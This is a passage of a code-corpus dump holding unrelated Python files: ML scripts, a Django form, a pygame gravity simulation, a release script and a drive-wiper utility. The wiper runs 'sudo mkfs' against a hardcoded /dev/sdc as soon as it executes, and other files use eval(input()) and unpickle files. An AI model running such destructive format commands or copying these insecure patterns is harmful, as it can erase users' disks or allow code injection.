constant_op.constant([\"avenger\", \"ironman\", \"avenger\"]))[\"output_0\"]\n self.assertIn(prediction0.numpy().decode(\"UTF-8\"), (\"yes\", \"no\"))\n\n prediction1 = loaded_serving_fn(\n constant_op.constant([\"ironman\", \"ironman\", \"unkonwn\"]))[\"output_0\"]\n self.assertIn(prediction1.numpy().decode(\"UTF-8\"), (\"yes\", \"no\"))\n","repo_name":"graphcore/tensorflow","sub_path":"tensorflow/python/keras/utils/kpl_test_utils.py","file_name":"kpl_test_utils.py","file_ext":"py","file_size_in_byte":6531,"program_lang":"python","lang":"en","doc_type":"code","stars":76,"dataset":"github-code","pt":"3"} +{"seq_id":"14887622811","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri May 8 16:59:06 2020\r\n\r\n@author: lx\r\n\"\"\"\r\n##导入相关算法库\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom sklearn.linear_model import Lasso\r\nfrom sklearn.linear_model import Ridge\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.datasets import load_boston\r\n\r\n##载入boston房价数据集\r\nboston = load_boston() \r\n\r\n##标准化处理\r\nscaler = StandardScaler()\r\nX = scaler.fit_transform(boston[\"data\"])\r\n\r\nY = boston[\"target\"]\r\n\r\nnames = boston[\"feature_names\"]\r\n\r\n##传统线性回归模型\r\nlr = 
LinearRegression()\r\nlr.fit(X,Y) #fit()默认loss为RSS,算法为GD\r\n\r\n##loss中加入l1正则项的lasso\r\nlasso = Lasso(alpha=.3)\r\nlasso.fit(X, Y)\r\n\r\n##loss中加入l2正则项的岭回归\r\nridge = Ridge(alpha=.3)\r\nridge.fit(X,Y)\r\n\r\n##分别输出三种方法所得到的参数值\r\nprint(\"Linear model:\", lr.coef_)\r\nprint('Lasso model:',lasso.coef_)\r\nprint(\"Ridge model:\",ridge.coef_)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"LZW-0313/Deep-Learning","sub_path":"L_1与L_2正则化.py","file_name":"L_1与L_2正则化.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"746658567","text":"import sys\n\nlambda input: sys.stdin.readline().rstrip\n\ndef solve(n, k):\n dp[1][1] = 1\n for i in range(2, 1002):\n for j in range(1, i+1):\n if j == 1:\n dp[i][j] = 1\n elif j == i:\n dp[i][j] = 1\n else:\n dp[i][j] = dp[i-1][j-1] + dp[i-1][j]\n\n\n print(dp[n+1][k+1] % 10007)\n\n\n\nif __name__ == '__main__':\n n, k = map(int, input().split())\n\n dp = list()\n dp = [[0] * 1002 for _ in range(1003)]\n\n # dp[n][k]\n\n solve(n, k)\n\n\n\n","repo_name":"qbinee/Baekjoon","sub_path":"math/11051.py","file_name":"11051.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17507688106","text":"#deel 1\ndef standaardtarief(km):\n if km <=0:\n prijs = 0\n else:\n if km >50:\n prijs = 15 + 0.60 * (km)\n else:\n prijs = 0.80 * (km)\n return prijs\n\n#deel 2\ndef ritprijs (leeftijd, weekendrit, afstandKM):\n prijs= standaardtarief(afstandKM)\n RitPrijs= prijs\n if not weekendrit:\n if leeftijd <12 or leeftijd >=65:\n RitPrijs = prijs * 0.70\n\n if weekendrit:\n if leeftijd <12 or leeftijd >=65:\n RitPrijs= prijs * 0.65\n else:\n RitPrijs= prijs * 0.60\n return RitPrijs\n\nleeftijd= eval(input('Wat is je leeftijd?\\n'))\nweekendrit= input('Reis je in het weekend?\\n')\nif weekendrit == 'Ja':\n weekendrit = True\nelse:\n weekendrit = False\nafstandKM= eval(input('Hoever reis je?\\n'))\nprint(ritprijs(leeftijd, weekendrit, afstandKM))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Taengoo0402/test_final_assignment","sub_path":"les1/final assignment ns.py","file_name":"final assignment ns.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"39276343637","text":"from django import forms\nfrom .models import Rate\nfrom account.models import MyUser\n\n\nclass PostRateForm(forms.ModelForm):\n\n class Meta:\n model = Rate\n fields = ('account',\n 'liner',\n 'pol',\n 'pod',\n 'buying20',\n 'selling20',\n 'buying40',\n 'selling40',\n 'buying4H',\n 'selling4H',\n 'loadingFT',\n 'dischargingFT',\n 'offeredDate',\n 'effectiveDate',\n 'remark',\n 'deleted',\n )\n\nclass PostSearchForm(forms.ModelForm):\n\n inputperson = forms.ModelChoiceField(queryset = MyUser.objects.all())\n\n class Meta:\n model = Rate\n fields = ('account',\n 'liner',\n 'pol',\n 'pod',\n )\n","repo_name":"mununki/RateLink-Backend","sub_path":"rate/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"7191479013","text":"import sys\nsys.path.append('/home-4/yhe23@jhu.edu/work/yuan/tools/python_lib/lib/python2.7/site-packages')\nimport pandas as pd\nimport numpy as np\nimport os\n#from matplotlib import pyplot as plt\nfrom collections import Counter\nimport 
pdb\n\n\ndef filterGenes(allGenes):\n ### Filter out non-functional genes\n uniqGenes = np.unique(allGenes)\n\n gene_anno = {}\n gene_annoFn = open('/work-zfs/abattle4/lab_data/annotation/gencode.v26/gencode.v26.annotation.gene.txt', 'r')\n for line in gene_annoFn.readlines():\n g = line.split('\\t')[0]\n if g in uniqGenes:\n gene_anno[g] = line.split('\\t')[6]\n\n \n allGenes_types = [gene_anno[g] for g in allGenes]\n allGenes_types = np.array(allGenes_types)\n ### allGenes_types: 69% protein coding, 9% linc RNA, 9% anti-sense, 5% processed_pseudogene, rest are other 32 gene types. \n quailfy_pairs_idx = np.where(allGenes_types == 'protein_coding')[0]\n print('After filtering for genes that dont produce protein, there are %d pairs left from %d' % (len(quailfy_pairs_idx), len(allGenes)))\n\n #plt.figure()\n #pd.DataFrame.from_dict(Counter(allGenes_types), orient='index').plot.bar()\n #plt.title('Gene types for gene in all SNP-gene pairs')\n #pd.DataFrame.from_dict(Counter(gene_anno.values()), orient='index').plot.bar()\n #plt.title('Gene types for unique gene in all SNP-gene pairs')\n #plt.show()\n #plt.savefig('%s/gene_types.pdf' % outdir)\n #plt.close()\n\n\n return quailfy_pairs_idx\n\n\n\n\n### read in all pairs\n#datadir = '/work-zfs/abattle4/heyuan/tissue_spec_eQTL_v8/datasets/cbset_datasets/cbset_per_tissue_W0.9/aggregate'\n#pairs = pd.read_csv('%s/v8_cbset_95_allPairs.txt' % datadir, sep='\\t')\n\ndatadir = '/work-zfs/abattle4/heyuan/tissue_spec_eQTL_v8/datasets/cbset_datasets/caviar_output_GTEx_LD/aggregate'\npairs = pd.read_csv('%s/v8_cbset_95_allPairs.txt' % datadir, sep='\\t')\n\ngood_idx = filterGenes(np.array(pairs['Gene']))\nfiltered_pairs = pairs.iloc[good_idx]\n\noutfn = '%s/v8_cbset_95_allPairs_filteredGenes.txt' % datadir\nfiltered_pairs.to_csv(outfn, sep='\\t', index=False)\n\nallSNPs = set(filtered_pairs['SNP'])\nsnpfn = open('/work-zfs/abattle4/heyuan/tissue_spec_eQTL_v8/datasets/GTEx_datasets/genotypes/SNPIDs.txt', 'w')\nfor snp in allSNPs:\n\tsnpfn.write('%s\\n' % snp)\n\n\n\n\n\n\n","repo_name":"heyuan7676/ts_eQTLs","sub_path":"Extended_Methods/input_dataset/filter_genes.py","file_name":"filter_genes.py","file_ext":"py","file_size_in_byte":2292,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"3"} +{"seq_id":"14462188552","text":"import pygame\nimport math\nimport random\nimport itertools\n\nv = \"0.0.2\"\n\n\npygame.init()\n\ndisplay = pygame.display.set_mode((1000, 800)) #w, h\nclick = pygame.time.Clock()\nFPS = 50\n\ndef calculate_acceleration(m1, m2, sep):\n if sep == 0:\n return [0, 0]\n Fg = ((6.67 * (10 ** -11)) * ((m1 * 100000) * (m2 * 100000))/((sep)**2))\n aform1 = Fg/m1\n aform2 = Fg/m2\n return [aform1, aform2]\n\ndef calculate_distance(x, y):\n xd = abs(x[0]-y[0])\n yd = abs(x[1]-y[1])\n r = math.sqrt(xd**2 + yd ** 2)\n return r\n\ndef calculate_fractions(p1, p2):\n #ac = F * AC/(BC+AC)\n ac = abs(p1[0] - p2[0])\n bc = abs(p1[1] - p2[1])\n forx = ac/(bc+ac)\n fory = bc/(bc+ac)\n return [round(forx, 10), round(fory, 10)]\n\ndef credits(screen):\n global v\n font=pygame.font.Font(None,30)\n txt=font.render(v, 1,(255,255,255))\n txt.set_alpha(50)\n screen.blit(txt, (10, 10))\n\ndef displaydata(screen, *args):\n font=pygame.font.Font(None,20)\n for k in args:\n txt=font.render(k, 1,(255,255,255))\n screen.blit(txt, (10, 40 + args.index(k) * 20))\n\n\nglobaloffset = [0, 0]\n\nclass Ball():\n def __init__(self, x, y, xvel, yvel, mass, color):\n self.positionx = float(x)\n self.positiony = float(y)\n self.velocityx 
= float(xvel)\n self.velocityy = float(yvel)\n self.color = pygame.Color(color)\n self.velocity = self.velocityx, self.velocityy\n self.mass = mass\n self.radius = 10\n self.dotpos = []\n \n def draw(self):\n pygame.draw.circle(display, self.color, (int(self.positionx + globaloffset[0]), int(self.positiony + globaloffset[1])), self.radius)\n \n \n\ndef game():\n global globaloffset\n balls = [Ball(400, 500, 200, 0, 100000, \"White\"), Ball(400, 300, -200, 0, 100000, \"Red\"), Ball(500, 400, 0, -200, 100000, \"Green\"), Ball(300, 400, 0, 200, 100000, \"Blue\")]\n #balls = [Ball(400, 500, 0, 0, 100000, \"White\"), Ball(400, 300, 0, 0, 100000, \"Green\"), Ball(300, 400, 0, 0, 100000, \"Red\"), Ball(500, 400, 0, 0, 100000, \"Yellow\")]\n #balls = [Ball(400, 300, 200, 0, 100000, \"White\"), Ball(400, 400, 0, 0, 200000, \"Red\"), Ball(400, 500, -200, 0, 100000, \"Green\")]\n #balls = [Ball(400, 400, 0.5, 0, 100000, \"White\"), Ball(400, 100, -50, 0, 1000, \"Green\"), Ball(400, 700, 50, 0, 1000, \"Yellow\")]\n #balls = []\n threshold = 1000\n paused = False\n\n\n focus = None\n \n while True:\n \n\n display.fill((0, 0, 0))\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n return\n if event.type == pygame.MOUSEBUTTONDOWN:\n pos = pygame.mouse.get_pos()\n newbdata = [pos[0], pos[1]]\n if event.type == pygame.MOUSEBUTTONUP:\n pos = pygame.mouse.get_pos()\n balls.append(Ball(newbdata[0]-globaloffset[0], newbdata[1]-globaloffset[1], pos[0]-newbdata[0], pos[1]-newbdata[1], 100000, (0, 255, 0)))\n \n if event.type == pygame.KEYUP:\n if event.key == pygame.K_SPACE:\n paused = not paused\n elif event.key == pygame.K_BACKSPACE:\n balls = []\n globaloffset = [0, 0]\n focus = None\n elif event.key == pygame.K_PERIOD:\n if focus is None or focus not in balls:\n focus = balls[0]\n else:\n if balls.index(focus) + 1 < len(balls):\n focus = balls[balls.index(focus) + 1]\n else:\n focus = balls[0]\n elif event.key == pygame.K_ESCAPE:\n focus = None\n\n\n keyspressed = pygame.key.get_pressed()\n if keyspressed[pygame.K_UP]: \n focus = None\n globaloffset[1] += 5\n if keyspressed[pygame.K_DOWN]: \n focus = None\n globaloffset[1] += -5\n if keyspressed[pygame.K_LEFT]:\n focus = None\n globaloffset[0] += 5\n if keyspressed[pygame.K_RIGHT]:\n focus = None\n globaloffset[0] += -5\n\n if focus is not None:\n globaloffset = [-focus.positionx+500, -focus.positiony+400]\n\n \n \n for i1 in balls:\n for j1 in balls:\n i, j = balls.index(i1), balls.index(j1)\n if i < j:\n acc = calculate_acceleration(i1.mass, j1.mass, calculate_distance((i1.positionx, i1.positiony), (j1.positionx, j1.positiony)))\n if i1.positionx > j1.positionx:\n i1.velocityx -= acc[0] * calculate_fractions((i1.positionx, i1.positiony), (j1.positionx, j1.positiony))[0]\n j1.velocityx += acc[1] * calculate_fractions((i1.positionx, i1.positiony), (j1.positionx, j1.positiony))[0]\n elif i1.positionx == j1.positionx:\n pass\n else:\n i1.velocityx += acc[0] * calculate_fractions((i1.positionx, i1.positiony), (j1.positionx, j1.positiony))[0]\n j1.velocityx -= acc[1] * calculate_fractions((i1.positionx, i1.positiony), (j1.positionx, j1.positiony))[0]\n if i1.positiony > j1.positiony:\n i1.velocityy -= acc[0] * calculate_fractions((i1.positionx, i1.positiony), (j1.positionx, j1.positiony))[1]\n j1.velocityy += acc[1] * calculate_fractions((i1.positionx, i1.positiony), (j1.positionx, j1.positiony))[1]\n elif i1.positiony == j1.positiony:\n pass\n else:\n i1.velocityy += acc[0] * calculate_fractions((i1.positionx, i1.positiony), (j1.positionx, 
j1.positiony))[1]\n j1.velocityy -= acc[1] * calculate_fractions((i1.positionx, i1.positiony), (j1.positionx, j1.positiony))[1]\n \n \n for m1 in balls[:]:\n for n1 in balls[:]:\n if m1 in balls and n1 in balls:\n if balls.index(m1) < balls.index(n1):\n if calculate_distance([m1.positionx, m1.positiony], [n1.positionx, n1.positiony]) <= (n1.radius + m1.radius):\n v1 = m1.velocityx * m1.mass/(m1.mass + n1.mass) + n1.velocityx * n1.mass/(m1.mass + n1.mass)\n v2 = m1.velocityy * m1.mass/(m1.mass + n1.mass) + n1.velocityy * n1.mass/(m1.mass + n1.mass)\n bcolor = pygame.Color(((m1.color[0]+n1.color[0])/2, (m1.color[1]+n1.color[1])/2, (m1.color[2]+n1.color[2])/2))\n newball = Ball((m1.positionx+n1.positionx)/2, (m1.positiony+n1.positiony)/2, v1, v2, m1.mass+n1.mass, bcolor)\n newball.radius = (n1.radius ** 2 + m1.radius ** 2) ** 0.5\n if focus == n1 or focus == m1:\n focus = newball\n balls.append(newball)\n balls.remove(n1)\n balls.remove(m1)\n \n\n\n for b in balls[:]:\n if len(balls) >= 50:\n if b.positionx > 2000 or b.positionx < -1200 or b.positiony > 2000 or b.positiony < -1200:\n balls.remove(b)\n continue\n b.positionx += round(b.velocityx/100, 8)\n b.positiony += round(b.velocityy/100, 8)\n b.draw()\n \n for k in balls:\n if len(k.dotpos) >= threshold:\n k.dotpos = k.dotpos[2:]\n \n k.dotpos.append((k.positionx, k.positiony))\n for dots in k.dotpos:\n pygame.draw.circle(display, pygame.Color(k.color), (dots[0] + globaloffset[0], dots[1] + globaloffset[1]), 1)\n credits(display)\n displaydata(display, f\"Coords: {int(globaloffset[0])}, {int(globaloffset[1])}\", f'Objects: {len(balls)}')\n pygame.display.update()\n click.tick(FPS)\nif __name__ == \"__main__\":\n game()\n pygame.quit()","repo_name":"BUSH222/bodies","sub_path":"old_versions/0.0.x/0.0.2.py","file_name":"0.0.2.py","file_ext":"py","file_size_in_byte":8098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30753366549","text":"#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport getopt, datetime, os, subprocess, sys\nos.chdir('../')\n\ndef main(argv):\n try:\n opts, args = getopt.getopt(argv, \"m:\", [\"message=\"])\n except getopt.GetoptError:\n sys.exit(2)\n for opt, arg in opts:\n if opt in (\"-m\", \"--message\"):\n message = arg\n major_v = 0\n minor_v = 6\n\n pyqtver = input('pyqtver: ')\n if pyqtver == 5:\n os.system(\"python3 prep-release/switch_pyqt5.py\")\n os.system(\"python3 prep-release/mkupdate_pyqt5\")\n elif pyqtver == 6:\n os.system(\"python3 prep-release/switch_pyqt6.py\")\n os.system(\"python3 prep-release/mkupdate_pyqt6\")\n\n #read minor minor release number\n f = open('prep-release/minor_minor_number.txt', 'r')\n ln = f.readlines()\n f.close()\n minor_minor_v = int(ln[0].strip()) + 1\n #write incremented minor minor release number\n f = open('prep-release/minor_minor_number.txt', 'w')\n f.write(str(minor_minor_v))\n f.close()\n builddate = datetime.datetime.now().strftime(\"%d-%b-%Y %H:%M\")\n #set git tag\n gittag = str(major_v) + '.' + str(minor_v) + '.' 
+ str(minor_minor_v)\n \n f = open('pyproject.toml', 'r')\n ln = f.readlines()\n f.close()\n for i in range(len(ln)):\n if ln[i].strip().split('=')[0].strip() == \"version\":\n ln[i] = ' version=\"' + gittag +'\"\\n'\n\n f = open('pyproject.toml', 'w')\n f.writelines(ln)\n f.close()\n\n # f = open('setup-pyside.py', 'r')\n # ln = f.readlines()\n # f.close()\n # for i in range(len(ln)):\n # if ln[i].strip().split('=')[0].strip() == \"version\":\n # ln[i] = ' version=\"' + gittag +'\",\\n'\n\n # f = open('setup-pyside.py', 'w')\n # f.writelines(ln)\n # f.close()\n\n \n\n f = open('pychoacoustics/_version_info.py', 'r')\n ln = f.readlines()\n f.close()\n for i in range(len(ln)):\n if ln[i].strip().split('=')[0].strip() == \"pychoacoustics_version\":\n ln[i] = 'pychoacoustics_version = \"' + gittag +'\"\\n'\n if ln[i].strip().split('=')[0].strip() == \"pychoacoustics_builddate\":\n ln[i] = 'pychoacoustics_builddate = \"' + builddate +'\"\\n'\n\n f = open('pychoacoustics/_version_info.py', 'w')\n f.writelines(ln)\n f.close()\n\n\n f = open('pychoacoustics/doc/conf.py', 'r')\n ln = f.readlines()\n f.close()\n for i in range(len(ln)):\n if ln[i].strip().split('=')[0].strip() == \"version\":\n ln[i] = 'version = \"' + gittag +'\"\\n'\n if ln[i].strip().split('=')[0].strip() == \"release\":\n ln[i] = 'release = \"' + gittag + '\"\\n'\n\n f = open('pychoacoustics/doc/conf.py', 'w')\n f.writelines(ln)\n f.close()\n\n f = open('pychoacoustics.desktop', 'r')\n ln = f.readlines()\n f.close()\n for i in range(len(ln)):\n if ln[i].strip().split('=')[0].strip() == \"Version\":\n ln[i] = 'Version = ' + gittag +'\\n'\n\n f = open('pychoacoustics.desktop', 'w')\n f.writelines(ln)\n f.close()\n\n f = open('setup_cx.py', 'r')\n ln = f.readlines()\n f.close()\n for i in range(len(ln)):\n if ln[i].strip().split('=')[0].strip() == \"version\":\n ln[i] = ' version=\"' + gittag +'\",\\n'\n\n f = open('setup_cx.py', 'w')\n f.writelines(ln)\n f.close()\n\n f = open('prep-release/win_pychoacoustics.iss', 'r')\n ln = f.readlines()\n f.close()\n for i in range(len(ln)):\n if len(ln[i].strip().split(\" \"))>1:\n if ln[i].strip().split(\" \")[1] == \"MyAppVersion\":\n ln[i] = \"#define MyAppVersion \" + '\"' + gittag + '\"\\n'#' version=\"' + gittag +'\"\\n'\n\n f = open('prep-release/win_pychoacoustics.iss', 'w')\n f.writelines(ln)\n f.close()\n\n \n subprocess.call('git commit -a -m\"' + message+'\"', shell=True)\n #tag the commit so that it can be easily retrieved\n subprocess.call('git tag -a \"' + gittag +'\"' + ' -m \"' + gittag +'\"', shell=True)\n \nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","repo_name":"sam81/pychoacoustics","sub_path":"prep-release/release.py","file_name":"release.py","file_ext":"py","file_size_in_byte":3968,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"3"} +{"seq_id":"43906707810","text":"import os\nimport psutil\nimport platform\nimport re\n\nclass Wiper():\n currDrive = ''\n drivePath = ''\n driveInfo = []\n linuxCommands = {}\n def __init__(self, drive=None):\n self.currDrive = drive\n\n def testDrive(self):\n print(self.drive)\n\n def closeDrive():\n self.drive.close()\n print(\"Drive Closed!\")\n\n def openDrive(self, drive):\n self.drive = drive\n print(\"Drive opened!\")\n\n def getFileSystem(self, driveLetter=None): #Gets file system and assigns it to self.drivePath\n print(self.drivePath)\n for disk in psutil.disk_partitions():\n print(disk[0])\n if driveLetter is None:\n if(disk[0] == self.drivePath):\n print(\"Found \" + 
self.drivePath + \"'s Metadata!\")\n self.driveInfo = disk\n print(self.driveInfo)\n else: #G:\\\\\n if(disk[0] == driveLetter):\n print(\"Found \" + self.drivePath + \"'s Metadata!\")\n self.driveInfo = disk\n print(self.driveInfo)\n\n\n return self.driveInfo\n\n def formatDrive(self, outputFileSystem=None, drive=None):\n if drive is None: #Use current drive\n drive = self.drive\n if outputFileSystem is None: #default Format\n outputFileSystem = \"FAT32\"\n if \"Linux\" in platform.platform(): #for Linux\n os.system(\"umount \" + self.drivePath)\n if outputFileSystem == \"FAT32\":\n os.system(\"sudo mkfs.vfat -F 32 \" + self.drivePath)\n print(\"Drive formatted to FAT32!\")\n elif outputFileSystem == \"ext4\": #Working\n os.system(\"sudo mkfs.ext4 \" + self.drivePath)\n print(\"Drive formatted to ext4!\")\n elif outputFileSystem == \"exFat\":\n os.system(\"sudo mkfs.exfat \" + self.drivePath)\n print(\"Drive formatted to exFat!\")\n\n def setDrivePath(self, path):\n self.drivePath = path\n\n def writeFile(self, fileName=None, string=None):#test Update: working!\n if fileName is None:\n fileName = \"sample.txt\"\n if string is None:\n string = \"Sample\"\n with open(os.path.join(self.driveInfo[1], fileName), \"w\") as file:\n file.write(string)\n print(\"File written at \" + os.path.join(self.driveInfo[1], fileName))\n\n def listFiles(self, path=None):\n if path is None:\n path = self.driveInfo[1]\n print(os.listdir(path))\n\n def deleteFile(self, fileName, algorithm=None, path=None):\n if path is None:\n path = self.driveInfo[1]\n if algorithm is None:\n algorithm = \"ZeroFill\"\n\n metadata = self.getMetaData(fileName)\n fileSize = metadata['File Size']\n with open(os.path.join(path,fileName), \"wb+\") as file:\n for ctr in range(0,fileSize):\n if algorithm is \"ZeroFill\":\n file.write(b'\\x00')\n print(\"Entered 0Fill\")\n elif algorithm is \"OneFill\":\n file.write(b'\\x11')\n print(\"Entered 1fill\")\n elif algorithm is \"AlterFill\": #Alternate Fill (0/1)\n if ctr % 0 is 0:\n file.write(b'\\x00')\n else:\n file.write(b'\\x11')\n elif algorithm is \"TwoFill\":\n file.write(b'\\x10')\n elif algorithm is \"ThreeFill\":\n file.write(b'\\x11')\n\n os.remove(os.path.join(path,fileName))\n\n print(\"File deleted!\")\n\n\n def getMetaData(self, fileName, path=None):\n if path is None:\n path = self.driveInfo[1]\n\n metadata = {}\n temp = os.stat(os.path.join(path,fileName))\n print(temp)\n metadata[\"File Name\"] = fileName\n metadata[\"Inode\"] = temp[1]\n metadata[\"File Size\"] = temp[6]\n\n print(metadata)\n return metadata\n #Do data unit and metadata layer\n\n#Variable for path (change using GUI or static only lol)\npath = \"/dev/sdc\"\n\n#Open drive in r+b\nwith open(path, 'r+b') as drive:\n wiper = Wiper()\n wiper.setDrivePath(path)\n wiper.openDrive(drive)\n\n#Testing the methods\nwiper.testDrive()\nwiper.getFileSystem()\nwiper.listFiles()\n#wiper.getMetadata(\"sample.txt\")\n#wiper.writeFile()\n#wiper.deleteFile(\"new 1.txt\", \"OneFill\")\nwiper.formatDrive(\"FAT32\") #Change argument to output fileSystem\n","repo_name":"joecatarata/DriveWiper","sub_path":"Formatter.py","file_name":"Formatter.py","file_ext":"py","file_size_in_byte":4510,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"14034844309","text":"import cv2\r\nimport numpy as np\r\nfrom annotation_helper import read_annotation, read_evaluate_annotation\r\nfrom interface import ModelData\r\n\r\ndef load_data(anno_path,input_shape, gray=True):\r\n data = 
read_annotation(anno_path)\r\n model_data = ModelData()\r\n model_data.X_train = np.array([ convert_data_format(item,input_shape,gray) for item in data.X_train])\r\n model_data.X_test = np.array([ convert_data_format(item,input_shape,gray) for item in data.X_test])\r\n model_data.Y_train = np.array([int(item) for item in data.Y_train] )\r\n model_data.Y_test = np.array([int(item) for item in data.Y_test])\r\n\r\n return model_data\r\n\r\ndef load_evaluate_data(anno_path,input_shape,gray=True):\r\n X,Y = read_evaluate_annotation(anno_path)\r\n x = np.array([ convert_data_format(item,input_shape,gray) for item in X])\r\n y = np.array([int(item) for item in Y])\r\n\r\n return x,y\r\n\r\ndef convert_data_format(item,input_shape,gray):\r\n new_item = cv2.resize(cv2.imread(item),input_shape)\r\n return cv2.cvtColor(new_item,cv2.COLOR_BGR2GRAY) if gray else new_item","repo_name":"khc0704/ez-model","sub_path":"ez_flask_server/data_helper.py","file_name":"data_helper.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31729989721","text":"import os\nimport sys\nimport time\n\nimport platformdirs\nfrom PySide6.QtCore import Qt, QTranslator\n\nimport nlight_res_rc\nimport darkdetect\nfrom PySide6.QtWidgets import QApplication\n\nfrom modrinthmanager.consts import APP_NAME, APP_VERSION\nfrom modrinthmanager.utils.threads import Thread\nfrom modrinthmanager.utils.utils import get_ui_style\nfrom modrinthmanager.windows.MainWindow import ParentWindow\n\n\nclass App(QApplication):\n def __init__(self, argv):\n super().__init__(argv)\n self.setApplicationDisplayName(APP_NAME)\n self.setApplicationVersion(APP_VERSION)\n # self.setWindowIcon(QIcon(Icons.App))\n\n self.translator = QTranslator()\n\n # self.load_font()\n # self.load_translator()\n self.update_style()\n\n # def load_translator(self):\n # self.translator.load(get_locale(QLocale().language()))\n # self.installTranslator(self.translator)\n\n # def load_font(self):\n # font = QFont(Fonts.SegoeUI, 9)\n # self.setFont(font)\n\n def update_style(self):\n self.setStyleSheet(get_ui_style(darkdetect.theme()))\n\n\nclass MainWindow(ParentWindow):\n def __init__(self):\n super().__init__()\n self.set_min_size_by_screen()\n self.setWindowTitle(APP_NAME)\n self._theme_updater = Thread(target=self.theme_listener, callback=self.update_style)\n self._theme_updater.start()\n self.show()\n\n @staticmethod\n def theme_listener():\n theme = darkdetect.theme()\n while darkdetect.theme() == theme:\n time.sleep(1)\n\n def update_style(self):\n app.update_style()\n self._theme_updater.start()\n\n def closeEvent(self, event):\n self._theme_updater.terminate()\n self._theme_updater.wait()\n app.closeAllWindows()\n event.accept()\n\n\nif __name__ == '__main__':\n QApplication.setHighDpiScaleFactorRoundingPolicy(Qt.HighDpiScaleFactorRoundingPolicy.RoundPreferFloor)\n QApplication.setStyle('Fusion')\n app = App(sys.argv)\n os.makedirs(f'{platformdirs.user_data_dir()}/{APP_NAME}', exist_ok=True)\n app.setStyleSheet(get_ui_style(darkdetect.theme()))\n window = MainWindow()\n sys.exit(app.exec())\n","repo_name":"brandonzorn/Modpacks-Manager","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"312807381","text":"import random\nimport time\nfrom env.constants import RANGE_OF_POINTS_LIMIT, RANGE_SIZE, NUM_OF_SEGMENTS\nfrom model.Point 
import Point\nfrom model.Segment import Segment\n\nimport sys\nimport OpenGL.GL as gl\nimport glfw\n\nimport pickle\ndef saveSegments(segments):\n timestr = time.strftime(\"%Y%m%d-%H%M%S\")\n filename = 'segments/segments_' + timestr + '.txt'\n dbfile = open(filename, 'wb')\n pickle.dump(segments, dbfile)\n dbfile.close()\n\n\ndef getSegments(filename = None):\n if not filename:\n return segmentFactory(-RANGE_OF_POINTS_LIMIT, RANGE_OF_POINTS_LIMIT,\n -RANGE_OF_POINTS_LIMIT, RANGE_OF_POINTS_LIMIT, NUM_OF_SEGMENTS, 0)\n dbfile = open(filename, 'rb')\n segments = pickle.load(dbfile)\n dbfile.close()\n\n reInitSegments = []\n for segment in segments:\n reInitSegments.append(Segment(segment.pt1, segment.pt2))\n return reInitSegments\n\n\ndef segmentFactory(minx,maxx,miny,maxy, numOfSegments, round_n_digits = 2):\n segments = [Segment(Point(0,0),Point(0,0))] * numOfSegments\n for i in range(0, numOfSegments):\n pt = [Point(0,0)]*2\n for j in range(0,2):\n if (round_n_digits == 0):\n pt[j] = Point(random.randint(minx, maxx), random.randint(miny, maxy))\n else:\n pt[j] = Point(round(random.uniform(minx,maxx),round_n_digits),\n round(random.uniform(miny,maxy),round_n_digits))\n segments[i] = Segment(pt[0], pt[1])\n return segments\n\n\ndef appendIfNotInList(list, data):\n if data in list:\n return\n list.append(data)\n\n\ndef drawResults(segments, intersectionPoints, windowTitle):\n def on_key(window, key, scancode, action, mods):\n if key == glfw.KEY_ESCAPE and action == glfw.PRESS:\n glfw.set_window_should_close(window,1)\n\n # Initialize the library\n if not glfw.init():\n sys.exit()\n\n # Create a windowed mode window and its OpenGL context\n window = glfw.create_window(2560, 1700, windowTitle, None, None)\n if not window:\n glfw.terminate()\n sys.exit()\n\n # Make the window's context current\n glfw.make_context_current(window)\n\n # Install a key handler\n glfw.set_key_callback(window, on_key)\n\n # Loop until the user closes the window\n while not glfw.window_should_close(window):\n # Render here\n width, height = glfw.get_framebuffer_size(window)\n gl.glClear(gl.GL_COLOR_BUFFER_BIT)\n\n gl.glColor3f(1.0, 1.0, 1.0)\n gl.glLineWidth(5.0)\n gl.glEnable(gl.GL_BLEND)\n gl.glBegin(gl.GL_LINES)\n for segment in segments:\n gl.glVertex2f(segment.pt1.x/RANGE_SIZE, segment.pt1.y/RANGE_SIZE)\n gl.glVertex2f(segment.pt2.x/RANGE_SIZE, segment.pt2.y/RANGE_SIZE)\n gl.glEnd()\n\n gl.glPointSize(15.0)\n gl.glColor3f(1.0, 0.2, .18)\n gl.glEnable(gl.GL_BLEND)\n\n gl.glBegin(gl.GL_POINTS)\n for point in intersectionPoints:\n gl.glVertex2f(point.x/RANGE_SIZE,point.y/RANGE_SIZE)\n gl.glEnd()\n\n gl.glFlush()\n\n # Swap front and back buffers\n glfw.swap_buffers(window)\n\n # Poll for and process events\n glfw.poll_events()\n\n 